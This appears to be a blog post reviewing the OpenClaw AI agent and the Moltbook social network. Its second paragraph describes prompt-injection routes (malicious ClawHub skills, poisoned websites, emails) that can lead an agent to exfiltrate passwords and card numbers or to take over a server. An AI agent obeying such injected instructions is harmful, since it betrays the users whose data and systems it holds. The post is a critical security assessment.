OpenClaw Unveiled: Utility Meets Unresolved Security Concerns Amidst AI Hype

Maximilian Schwarzmüller
#ai agents #security #prompt-injection #openclaw #llms

The recent surge in AI agent excitement has brought OpenClaw (formerly ClawdBot) and the social network Moltbook into focus, prompting a detailed evaluation that reveals a more nuanced picture than commonly presented. While acknowledging the impressive feat of a single developer creating OpenClaw, the analysis points to significant challenges in both practical utility and, critically, security. Many users find existing, specialized AI tools—such as Google’s AI mode, Deep Research on Gemini, or SuperGrok for X—to be more effective and secure for common tasks like web research, obviating the need for a general-purpose agent with broad system access. Furthermore, the inherent unpredictability of Large Language Models (LLMs) and the necessary broad permissions for comprehensive automation create a trust dilemma, making users hesitant to grant access to sensitive data or core system functionalities.

The primary concern revolves around the persistent and fundamentally unsolved problem of prompt injection, which presents a significant attack surface. OpenClaw’s official security documentation confirms that prompt injection cannot be fully mitigated in LLMs, irrespective of model advancements. Attack vectors are manifold: malicious skills distributed through platforms like ClawHub (despite recent security improvements), embedded prompts on internet-accessed websites, and even processed emails can all trick the AI into executing unintended commands. These vulnerabilities open the door to severe consequences, including data exfiltration—where an attacker could compel the AI to gather and transmit sensitive information like passwords, secrets, or credit card numbers—and even system takeover, potentially transforming a VPS into a botnet or facilitating the installation of malicious software. While sandboxing (e.g., Docker containers) and running on a VPS can reduce the blast radius, they do not eliminate the risk of data exfiltration. Moreover, continuous manual approval for tasks, while enhancing security, defeats the core promise of an autonomous assistant, leading to user fatigue and a potential lapse in oversight. The review also notes the poor quality of OpenClaw’s documentation, making secure configuration an arduous task. In a separate assessment, Moltbook, described as an ‘AI-only social network,’ was criticized for being ‘human-orchestrated,’ ‘fake,’ and having ‘gaping security issues,’ questioning its overall value proposition.